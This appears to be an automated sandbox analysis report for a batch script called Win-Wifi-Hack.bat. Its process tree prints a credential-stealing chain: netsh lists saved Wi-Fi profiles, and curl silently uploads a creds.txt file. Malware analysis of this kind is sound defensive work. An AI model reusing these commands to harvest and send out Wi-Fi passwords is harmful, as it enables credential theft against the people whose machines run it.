732be9a3433a3e31785a2b0147a71b30fda3081a12b6279d16707377253e08ec | Triage

Analysis

max time kernel
16s
max time network
21s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
28/01/2024, 07:59

Sharing

Report Analysis Logs

General

Target

Win-Wifi-Hack.bat
Size

696B
MD5

869c35a019cab10d5ee5d3929c8ddf8f
SHA1

3a82aa458d47bd373a2ec4aaa585c0bf9b923edc
SHA256

732be9a3433a3e31785a2b0147a71b30fda3081a12b6279d16707377253e08ec
SHA512

681aef6ef6b921f9195855a00c015c7b91297fbe33f7c3475b6bbeb7ac951699993ad1f5863d55c1c407f5ec011d3ead28616e989bc29694d2bf62658c76e49c

Score

1^/10

Malware Config

Signatures

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 876 wrote to memory of 1940	876	cmd.exe	86
PID 876 wrote to memory of 1940	876	cmd.exe	86
PID 876 wrote to memory of 3620	876	cmd.exe	87
PID 876 wrote to memory of 3620	876	cmd.exe	87
PID 876 wrote to memory of 4296	876	cmd.exe	90
PID 876 wrote to memory of 4296	876	cmd.exe	90

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Win-Wifi-Hack.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:876
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  PID:1940
- C:\Windows\system32\findstr.exe
  findstr /R /C:"[ ]:[ ]"
  2⤵
  PID:3620
- C:\Windows\system32\curl.exe
  curl --silent --output /dev/null -F h=@"C:\Users\Admin\AppData\Local\Temp\creds.txt"
  2⤵
  PID:4296

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads